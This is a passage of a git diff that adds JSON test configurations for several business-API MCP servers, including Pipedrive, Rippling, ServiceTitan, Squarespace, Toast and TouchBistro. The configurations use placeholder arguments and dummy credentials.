0" + }, + "list_lists": { + "args": { + "count": 50, + "offset": 50 + }, + "expect": "content && content.length > 0" + }, + "add_subscriber": { + "args": { + "list_id": "test-id-123", + "email": "test@example.com", + "status": "subscribed", + "first_name": "Test Name", + "last_name": "Test Name", + "tags": [] + }, + "expect": "content && content.length > 0" + }, + "add_subscriber:empty-first_name": { + "args": { + "list_id": "test-id-123", + "email": "test@example.com", + "status": "subscribed", + "first_name": "", + "last_name": "Test Name", + "tags": [] + }, + "expect": "exists" + }, + "add_subscriber:empty-last_name": { + "args": { + "list_id": "test-id-123", + "email": "test@example.com", + "status": "subscribed", + "first_name": "Test Name", + "last_name": "", + "tags": [] + }, + "expect": "exists" + }, + "get_subscriber": { + "args": { + "list_id": "test-id-123", + "email": "test@example.com" + }, + "expect": "content && content.length > 0" + }, + "list_templates": { + "args": { + "count": 50, + "offset": 50, + "type": "user" + }, + "expect": "content && content.length > 0" + }, + "list_templates:empty-type": { + "args": { + "count": 50, + "offset": 50, + "type": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/mailchimp.json b/factory-tools/test-configs/mailchimp.json new file mode 100644 index 0000000..3aae0e8 --- /dev/null +++ b/factory-tools/test-configs/mailchimp.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/mailchimp/dist/index.js" + ], + "env": { + "MAILCHIMP_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/pipedrive-tests.json b/factory-tools/test-configs/pipedrive-tests.json new file mode 100644 index 0000000..0882579 --- /dev/null +++ 
b/factory-tools/test-configs/pipedrive-tests.json @@ -0,0 +1,470 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/pipedrive/dist/index.js" + ], + "env": { + "PIPEDRIVE_API_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_deals": { + "args": { + "status": "open", + "start": 50, + "limit": 50, + "sort": "test_value", + "user_id": 50, + "stage_id": 50, + "pipeline_id": 50 + }, + "expect": "content && content.length > 0" + }, + "list_deals:empty-status": { + "args": { + "status": "", + "start": 50, + "limit": 50, + "sort": "test_value", + "user_id": 50, + "stage_id": 50, + "pipeline_id": 50 + }, + "expect": "exists" + }, + "list_deals:empty-sort": { + "args": { + "status": "open", + "start": 50, + "limit": 50, + "sort": "", + "user_id": 50, + "stage_id": 50, + "pipeline_id": 50 + }, + "expect": "exists" + }, + "get_deal": { + "args": { + "id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_deal": { + "args": { + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "pipeline_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "visible_to": 50 + }, + "expect": "content && content.length > 0" + }, + "create_deal:empty-currency": { + "args": { + "title": "test_value", + "value": 50, + "currency": "", + "person_id": 50, + "org_id": 50, + "pipeline_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "visible_to": 50 + }, + "expect": "exists" + }, + "create_deal:empty-status": { + "args": { + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "pipeline_id": 50, + "stage_id": 50, + "status": "", + "expected_close_date": "test_value", + "probability": 50, + "visible_to": 50 + }, + "expect": "exists" + }, + "create_deal:empty-expected_close_date": { + 
"args": { + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "pipeline_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "", + "probability": 50, + "visible_to": 50 + }, + "expect": "exists" + }, + "update_deal": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "test_value", + "won_time": "test_value", + "lost_time": "test_value" + }, + "expect": "content && content.length > 0" + }, + "update_deal:empty-title": { + "args": { + "id": 50, + "title": "", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "test_value", + "won_time": "test_value", + "lost_time": "test_value" + }, + "expect": "exists" + }, + "update_deal:empty-currency": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "test_value", + "won_time": "test_value", + "lost_time": "test_value" + }, + "expect": "exists" + }, + "update_deal:empty-status": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "test_value", + "won_time": "test_value", + "lost_time": "test_value" + }, + "expect": "exists" + }, + "update_deal:empty-expected_close_date": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "", + 
"probability": 50, + "lost_reason": "test_value", + "won_time": "test_value", + "lost_time": "test_value" + }, + "expect": "exists" + }, + "update_deal:empty-lost_reason": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "", + "won_time": "test_value", + "lost_time": "test_value" + }, + "expect": "exists" + }, + "update_deal:empty-won_time": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "test_value", + "won_time": "", + "lost_time": "test_value" + }, + "expect": "exists" + }, + "update_deal:empty-lost_time": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "test_value", + "won_time": "test_value", + "lost_time": "" + }, + "expect": "exists" + }, + "list_persons": { + "args": { + "start": 50, + "limit": 50, + "sort": "test_value", + "filter_id": 50, + "first_char": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_persons:empty-sort": { + "args": { + "start": 50, + "limit": 50, + "sort": "", + "filter_id": 50, + "first_char": "test_value" + }, + "expect": "exists" + }, + "list_persons:empty-first_char": { + "args": { + "start": 50, + "limit": 50, + "sort": "test_value", + "filter_id": 50, + "first_char": "" + }, + "expect": "exists" + }, + "create_person": { + "args": { + "name": "Test Name", + "email": [], + "phone": [], + "org_id": 50, + "visible_to": 50, + "add_time": "test_value" + }, + "expect": "content && content.length > 0" + }, + 
"create_person:empty-add_time": { + "args": { + "name": "Test Name", + "email": [], + "phone": [], + "org_id": 50, + "visible_to": 50, + "add_time": "" + }, + "expect": "exists" + }, + "list_activities": { + "args": { + "start": 50, + "limit": 50, + "user_id": 50, + "type": "test_value", + "done": 50, + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_activities:empty-type": { + "args": { + "start": 50, + "limit": 50, + "user_id": 50, + "type": "", + "done": 50, + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "exists" + }, + "list_activities:empty-start_date": { + "args": { + "start": 50, + "limit": 50, + "user_id": 50, + "type": "test_value", + "done": 50, + "start_date": "", + "end_date": "test_value" + }, + "expect": "exists" + }, + "list_activities:empty-end_date": { + "args": { + "start": 50, + "limit": 50, + "user_id": 50, + "type": "test_value", + "done": 50, + "start_date": "test_value", + "end_date": "" + }, + "expect": "exists" + }, + "add_activity": { + "args": { + "subject": "test_value", + "type": "test_value", + "due_date": "test_value", + "due_time": "test_value", + "duration": "test_value", + "deal_id": 50, + "person_id": 50, + "org_id": 50, + "note": "test_value", + "done": 50, + "busy_flag": true, + "participants": [] + }, + "expect": "content && content.length > 0" + }, + "add_activity:empty-type": { + "args": { + "subject": "test_value", + "type": "", + "due_date": "test_value", + "due_time": "test_value", + "duration": "test_value", + "deal_id": 50, + "person_id": 50, + "org_id": 50, + "note": "test_value", + "done": 50, + "busy_flag": true, + "participants": [] + }, + "expect": "exists" + }, + "add_activity:empty-due_date": { + "args": { + "subject": "test_value", + "type": "test_value", + "due_date": "", + "due_time": "test_value", + "duration": "test_value", + "deal_id": 50, + "person_id": 50, + "org_id": 50, + "note": "test_value", + "done": 50, + 
"busy_flag": true, + "participants": [] + }, + "expect": "exists" + }, + "add_activity:empty-due_time": { + "args": { + "subject": "test_value", + "type": "test_value", + "due_date": "test_value", + "due_time": "", + "duration": "test_value", + "deal_id": 50, + "person_id": 50, + "org_id": 50, + "note": "test_value", + "done": 50, + "busy_flag": true, + "participants": [] + }, + "expect": "exists" + }, + "add_activity:empty-duration": { + "args": { + "subject": "test_value", + "type": "test_value", + "due_date": "test_value", + "due_time": "test_value", + "duration": "", + "deal_id": 50, + "person_id": 50, + "org_id": 50, + "note": "test_value", + "done": 50, + "busy_flag": true, + "participants": [] + }, + "expect": "exists" + }, + "add_activity:empty-note": { + "args": { + "subject": "test_value", + "type": "test_value", + "due_date": "test_value", + "due_time": "test_value", + "duration": "test_value", + "deal_id": 50, + "person_id": 50, + "org_id": 50, + "note": "", + "done": 50, + "busy_flag": true, + "participants": [] + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/pipedrive.json b/factory-tools/test-configs/pipedrive.json new file mode 100644 index 0000000..8ff41c3 --- /dev/null +++ b/factory-tools/test-configs/pipedrive.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/pipedrive/dist/index.js" + ], + "env": { + "PIPEDRIVE_API_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/rippling-tests.json b/factory-tools/test-configs/rippling-tests.json new file mode 100644 index 0000000..55cf726 --- /dev/null +++ b/factory-tools/test-configs/rippling-tests.json @@ -0,0 +1,179 @@ +{ + "server": { + "command": "node", + "args": [ + 
"/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/rippling/dist/index.js" + ], + "env": { + "RIPPLING_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_employees": { + "args": { + "limit": 50, + "offset": 50, + "include_terminated": true + }, + "expect": "content && content.length > 0" + }, + "get_employee": { + "args": { + "employee_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_departments": { + "args": { + "limit": 50, + "offset": 50 + }, + "expect": "content && content.length > 0" + }, + "list_teams": { + "args": { + "limit": 50, + "offset": 50 + }, + "expect": "content && content.length > 0" + }, + "get_payroll": { + "args": { + "employee_id": "test-id-123", + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_payroll:empty-employee_id": { + "args": { + "employee_id": "", + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "exists" + }, + "get_payroll:empty-start_date": { + "args": { + "employee_id": "test-id-123", + "start_date": "", + "end_date": "test_value" + }, + "expect": "exists" + }, + "get_payroll:empty-end_date": { + "args": { + "employee_id": "test-id-123", + "start_date": "test_value", + "end_date": "" + }, + "expect": "exists" + }, + "list_devices": { + "args": { + "limit": 50, + "offset": 50, + "employee_id": "test-id-123", + "device_type": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_devices:empty-employee_id": { + "args": { + "limit": 50, + "offset": 50, + "employee_id": "", + "device_type": "test_value" + }, + "expect": "exists" + }, + "list_devices:empty-device_type": { + "args": { + "limit": 50, + "offset": 50, + "employee_id": "test-id-123", + "device_type": "" + }, + "expect": "exists" + }, + "list_apps": { + "args": { + "limit": 50, + "offset": 50 + }, + "expect": "content && content.length > 0" + }, + "get_company": { + "args": {}, + "expect": 
"content && content.length > 0" + }, + "list_groups": { + "args": {}, + "expect": "content && content.length > 0" + }, + "list_levels": { + "args": { + "limit": 50, + "offset": 50 + }, + "expect": "content && content.length > 0" + }, + "list_work_locations": { + "args": { + "limit": 50, + "offset": 50 + }, + "expect": "content && content.length > 0" + }, + "get_leave_requests": { + "args": { + "employee_id": "test-id-123", + "status": "test_value", + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_leave_requests:empty-employee_id": { + "args": { + "employee_id": "", + "status": "test_value", + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "exists" + }, + "get_leave_requests:empty-status": { + "args": { + "employee_id": "test-id-123", + "status": "", + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "exists" + }, + "get_leave_requests:empty-start_date": { + "args": { + "employee_id": "test-id-123", + "status": "test_value", + "start_date": "", + "end_date": "test_value" + }, + "expect": "exists" + }, + "get_leave_requests:empty-end_date": { + "args": { + "employee_id": "test-id-123", + "status": "test_value", + "start_date": "test_value", + "end_date": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/rippling.json b/factory-tools/test-configs/rippling.json new file mode 100644 index 0000000..d74a357 --- /dev/null +++ b/factory-tools/test-configs/rippling.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/rippling/dist/index.js" + ], + "env": { + "RIPPLING_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/servicetitan-tests.json b/factory-tools/test-configs/servicetitan-tests.json new 
file mode 100644 index 0000000..eb5bdc2 --- /dev/null +++ b/factory-tools/test-configs/servicetitan-tests.json @@ -0,0 +1,288 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/servicetitan/dist/index.js" + ], + "env": { + "SERVICETITAN_CLIENT_ID": "factory_discovery_dummy", + "SERVICETITAN_CLIENT_SECRET": "factory_discovery_dummy", + "SERVICETITAN_TENANT_ID": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_jobs": { + "args": { + "page": 50, + "pageSize": 50, + "status": "test_value", + "customerId": 50, + "technicianId": 50, + "createdOnOrAfter": "test_value", + "completedOnOrAfter": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_jobs:empty-status": { + "args": { + "page": 50, + "pageSize": 50, + "status": "", + "customerId": 50, + "technicianId": 50, + "createdOnOrAfter": "test_value", + "completedOnOrAfter": "test_value" + }, + "expect": "exists" + }, + "list_jobs:empty-createdOnOrAfter": { + "args": { + "page": 50, + "pageSize": 50, + "status": "test_value", + "customerId": 50, + "technicianId": 50, + "createdOnOrAfter": "", + "completedOnOrAfter": "test_value" + }, + "expect": "exists" + }, + "list_jobs:empty-completedOnOrAfter": { + "args": { + "page": 50, + "pageSize": 50, + "status": "test_value", + "customerId": 50, + "technicianId": 50, + "createdOnOrAfter": "test_value", + "completedOnOrAfter": "" + }, + "expect": "exists" + }, + "get_job": { + "args": { + "job_id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_job": { + "args": { + "customerId": 50, + "locationId": 50, + "jobTypeId": 50, + "priority": "test_value", + "businessUnitId": 50, + "campaignId": 50, + "summary": "test_value", + "scheduledStart": "test_value", + "scheduledEnd": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_job:empty-priority": { + "args": { + "customerId": 50, + "locationId": 50, + "jobTypeId": 50, + "priority": 
"", + "businessUnitId": 50, + "campaignId": 50, + "summary": "test_value", + "scheduledStart": "test_value", + "scheduledEnd": "test_value" + }, + "expect": "exists" + }, + "create_job:empty-summary": { + "args": { + "customerId": 50, + "locationId": 50, + "jobTypeId": 50, + "priority": "test_value", + "businessUnitId": 50, + "campaignId": 50, + "summary": "", + "scheduledStart": "test_value", + "scheduledEnd": "test_value" + }, + "expect": "exists" + }, + "create_job:empty-scheduledStart": { + "args": { + "customerId": 50, + "locationId": 50, + "jobTypeId": 50, + "priority": "test_value", + "businessUnitId": 50, + "campaignId": 50, + "summary": "test_value", + "scheduledStart": "", + "scheduledEnd": "test_value" + }, + "expect": "exists" + }, + "create_job:empty-scheduledEnd": { + "args": { + "customerId": 50, + "locationId": 50, + "jobTypeId": 50, + "priority": "test_value", + "businessUnitId": 50, + "campaignId": 50, + "summary": "test_value", + "scheduledStart": "test_value", + "scheduledEnd": "" + }, + "expect": "exists" + }, + "list_customers": { + "args": { + "page": 50, + "pageSize": 50, + "name": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "createdOnOrAfter": "test_value", + "active": true + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-name": { + "args": { + "page": 50, + "pageSize": 50, + "name": "", + "email": "test@example.com", + "phone": "test_value", + "createdOnOrAfter": "test_value", + "active": true + }, + "expect": "exists" + }, + "list_customers:empty-email": { + "args": { + "page": 50, + "pageSize": 50, + "name": "Test Name", + "email": "", + "phone": "test_value", + "createdOnOrAfter": "test_value", + "active": true + }, + "expect": "exists" + }, + "list_customers:empty-phone": { + "args": { + "page": 50, + "pageSize": 50, + "name": "Test Name", + "email": "test@example.com", + "phone": "", + "createdOnOrAfter": "test_value", + "active": true + }, + "expect": "exists" + }, + 
"list_customers:empty-createdOnOrAfter": { + "args": { + "page": 50, + "pageSize": 50, + "name": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "createdOnOrAfter": "", + "active": true + }, + "expect": "exists" + }, + "get_customer": { + "args": { + "customer_id": 50 + }, + "expect": "content && content.length > 0" + }, + "list_invoices": { + "args": { + "page": 50, + "pageSize": 50, + "status": "test_value", + "customerId": 50, + "jobId": 50, + "createdOnOrAfter": "test_value", + "total_gte": 50 + }, + "expect": "content && content.length > 0" + }, + "list_invoices:empty-status": { + "args": { + "page": 50, + "pageSize": 50, + "status": "", + "customerId": 50, + "jobId": 50, + "createdOnOrAfter": "test_value", + "total_gte": 50 + }, + "expect": "exists" + }, + "list_invoices:empty-createdOnOrAfter": { + "args": { + "page": 50, + "pageSize": 50, + "status": "test_value", + "customerId": 50, + "jobId": 50, + "createdOnOrAfter": "", + "total_gte": 50 + }, + "expect": "exists" + }, + "list_technicians": { + "args": { + "page": 50, + "pageSize": 50, + "active": true, + "businessUnitId": 50 + }, + "expect": "content && content.length > 0" + }, + "list_appointments": { + "args": { + "page": 50, + "pageSize": 50, + "startsOnOrAfter": "test_value", + "startsOnOrBefore": "test_value", + "technicianId": 50, + "jobId": 50 + }, + "expect": "content && content.length > 0" + }, + "list_appointments:empty-startsOnOrAfter": { + "args": { + "page": 50, + "pageSize": 50, + "startsOnOrAfter": "", + "startsOnOrBefore": "test_value", + "technicianId": 50, + "jobId": 50 + }, + "expect": "exists" + }, + "list_appointments:empty-startsOnOrBefore": { + "args": { + "page": 50, + "pageSize": 50, + "startsOnOrAfter": "test_value", + "startsOnOrBefore": "", + "technicianId": 50, + "jobId": 50 + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git 
a/factory-tools/test-configs/servicetitan.json b/factory-tools/test-configs/servicetitan.json new file mode 100644 index 0000000..14e0154 --- /dev/null +++ b/factory-tools/test-configs/servicetitan.json @@ -0,0 +1,13 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/servicetitan/dist/index.js" + ], + "env": { + "SERVICETITAN_CLIENT_ID": "factory_discovery_dummy", + "SERVICETITAN_CLIENT_SECRET": "factory_discovery_dummy", + "SERVICETITAN_TENANT_ID": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/squarespace-tests.json b/factory-tools/test-configs/squarespace-tests.json new file mode 100644 index 0000000..9e30cd0 --- /dev/null +++ b/factory-tools/test-configs/squarespace-tests.json @@ -0,0 +1,159 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/squarespace/dist/index.js" + ], + "env": { + "SQUARESPACE_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_pages": { + "args": { + "cursor": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_pages:empty-cursor": { + "args": { + "cursor": "" + }, + "expect": "exists" + }, + "get_page": { + "args": { + "pageId": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_products": { + "args": { + "cursor": "test_value", + "modifiedAfter": "test_value", + "modifiedBefore": "test_value", + "type": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_products:empty-cursor": { + "args": { + "cursor": "", + "modifiedAfter": "test_value", + "modifiedBefore": "test_value", + "type": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-modifiedAfter": { + "args": { + "cursor": "test_value", + "modifiedAfter": "", + "modifiedBefore": "test_value", + "type": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-modifiedBefore": 
{ + "args": { + "cursor": "test_value", + "modifiedAfter": "test_value", + "modifiedBefore": "", + "type": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-type": { + "args": { + "cursor": "test_value", + "modifiedAfter": "test_value", + "modifiedBefore": "test_value", + "type": "" + }, + "expect": "exists" + }, + "get_product": { + "args": { + "productId": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_orders": { + "args": { + "cursor": "test_value", + "modifiedAfter": "test_value", + "modifiedBefore": "test_value", + "fulfillmentStatus": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_orders:empty-cursor": { + "args": { + "cursor": "", + "modifiedAfter": "test_value", + "modifiedBefore": "test_value", + "fulfillmentStatus": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-modifiedAfter": { + "args": { + "cursor": "test_value", + "modifiedAfter": "", + "modifiedBefore": "test_value", + "fulfillmentStatus": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-modifiedBefore": { + "args": { + "cursor": "test_value", + "modifiedAfter": "test_value", + "modifiedBefore": "", + "fulfillmentStatus": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-fulfillmentStatus": { + "args": { + "cursor": "test_value", + "modifiedAfter": "test_value", + "modifiedBefore": "test_value", + "fulfillmentStatus": "" + }, + "expect": "exists" + }, + "get_order": { + "args": { + "orderId": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_inventory": { + "args": { + "cursor": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_inventory:empty-cursor": { + "args": { + "cursor": "" + }, + "expect": "exists" + }, + "update_inventory": { + "args": { + "variantId": "test-id-123", + "quantity": 50, + "quantityDelta": 50, + "isUnlimited": true + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": 
{}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/squarespace.json b/factory-tools/test-configs/squarespace.json new file mode 100644 index 0000000..ebb7c81 --- /dev/null +++ b/factory-tools/test-configs/squarespace.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/squarespace/dist/index.js" + ], + "env": { + "SQUARESPACE_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/toast-tests.json b/factory-tools/test-configs/toast-tests.json new file mode 100644 index 0000000..a31cff4 --- /dev/null +++ b/factory-tools/test-configs/toast-tests.json @@ -0,0 +1,188 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/toast/dist/index.js" + ], + "env": { + "TOAST_CLIENT_ID": "factory_discovery_dummy", + "TOAST_CLIENT_SECRET": "factory_discovery_dummy", + "TOAST_RESTAURANT_GUID": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_orders": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "page_size": 50, + "page_token": "test_value", + "business_date": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_orders:empty-page_token": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "page_size": 50, + "page_token": "", + "business_date": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-business_date": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "page_size": 50, + "page_token": "test_value", + "business_date": "" + }, + "expect": "exists" + }, + "get_order": { + "args": { + "order_guid": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_menu_items": { + "args": { + "menu_guid": "test-id-123", + "include_modifiers": true + }, + "expect": "content && content.length > 
0" + }, + "list_menu_items:empty-menu_guid": { + "args": { + "menu_guid": "", + "include_modifiers": true + }, + "expect": "exists" + }, + "update_menu_item": { + "args": { + "item_guid": "test-id-123", + "quantity": "test_value", + "status": "test_value" + }, + "expect": "content && content.length > 0" + }, + "update_menu_item:empty-quantity": { + "args": { + "item_guid": "test-id-123", + "quantity": "", + "status": "test_value" + }, + "expect": "exists" + }, + "update_menu_item:empty-status": { + "args": { + "item_guid": "test-id-123", + "quantity": "test_value", + "status": "" + }, + "expect": "exists" + }, + "list_employees": { + "args": { + "page_size": 50, + "page_token": "test_value", + "include_archived": true + }, + "expect": "content && content.length > 0" + }, + "list_employees:empty-page_token": { + "args": { + "page_size": 50, + "page_token": "", + "include_archived": true + }, + "expect": "exists" + }, + "get_labor": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "employee_guid": "test-id-123", + "page_size": 50, + "page_token": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_labor:empty-employee_guid": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "employee_guid": "", + "page_size": 50, + "page_token": "test_value" + }, + "expect": "exists" + }, + "get_labor:empty-page_token": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "employee_guid": "test-id-123", + "page_size": 50, + "page_token": "" + }, + "expect": "exists" + }, + "list_checks": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "page_size": 50, + "page_token": "test_value", + "check_status": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_checks:empty-page_token": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "page_size": 50, + "page_token": "", + "check_status": "test_value" + }, + "expect": "exists" + }, 
+ "list_checks:empty-check_status": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "page_size": 50, + "page_token": "test_value", + "check_status": "" + }, + "expect": "exists" + }, + "void_check": { + "args": { + "order_guid": "test-id-123", + "check_guid": "test-id-123", + "void_reason": "test-id-123", + "void_business_date": 50 + }, + "expect": "content && content.length > 0" + }, + "void_check:empty-void_reason": { + "args": { + "order_guid": "test-id-123", + "check_guid": "test-id-123", + "void_reason": "", + "void_business_date": 50 + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/toast.json b/factory-tools/test-configs/toast.json new file mode 100644 index 0000000..fb43986 --- /dev/null +++ b/factory-tools/test-configs/toast.json @@ -0,0 +1,13 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/toast/dist/index.js" + ], + "env": { + "TOAST_CLIENT_ID": "factory_discovery_dummy", + "TOAST_CLIENT_SECRET": "factory_discovery_dummy", + "TOAST_RESTAURANT_GUID": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/touchbistro-tests.json b/factory-tools/test-configs/touchbistro-tests.json new file mode 100644 index 0000000..a42add5 --- /dev/null +++ b/factory-tools/test-configs/touchbistro-tests.json @@ -0,0 +1,250 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/touchbistro/dist/index.js" + ], + "env": { + "TOUCHBISTRO_API_KEY": "factory_discovery_dummy", + "TOUCHBISTRO_VENUE_ID": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_orders": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "orderType": "dine_in", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "content && 
content.length > 0" + }, + "list_orders:empty-status": { + "args": { + "page": 50, + "pageSize": 50, + "status": "", + "orderType": "dine_in", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-orderType": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "orderType": "", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-startDate": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "orderType": "dine_in", + "startDate": "", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-endDate": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "orderType": "dine_in", + "startDate": "test_value", + "endDate": "" + }, + "expect": "exists" + }, + "get_order": { + "args": { + "id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_menu_items": { + "args": { + "page": 50, + "pageSize": 50, + "categoryId": "test-id-123", + "active": true + }, + "expect": "content && content.length > 0" + }, + "list_menu_items:empty-categoryId": { + "args": { + "page": 50, + "pageSize": 50, + "categoryId": "", + "active": true + }, + "expect": "exists" + }, + "list_reservations": { + "args": { + "page": 50, + "pageSize": 50, + "date": "test_value", + "status": "pending", + "partySize": 50 + }, + "expect": "content && content.length > 0" + }, + "list_reservations:empty-date": { + "args": { + "page": 50, + "pageSize": 50, + "date": "", + "status": "pending", + "partySize": 50 + }, + "expect": "exists" + }, + "list_reservations:empty-status": 